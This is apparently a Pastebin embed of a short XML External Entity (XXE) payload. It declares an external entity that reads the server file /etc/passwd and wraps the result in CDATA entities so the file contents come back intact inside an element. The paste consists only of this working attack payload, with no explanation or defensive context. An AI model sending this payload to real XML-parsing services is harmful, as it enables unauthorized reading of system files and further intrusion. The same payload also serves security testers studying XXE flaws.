document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE root [
  3. <!ENTITY xxe SYSTEM "file:///etc/passwd">
  4. <!ENTITY start "<![CDATA[">
  5. <!ENTITY end "]]>">
  6. ]>
  7. <elemento>&start;&xxe;&end;</elemento>
');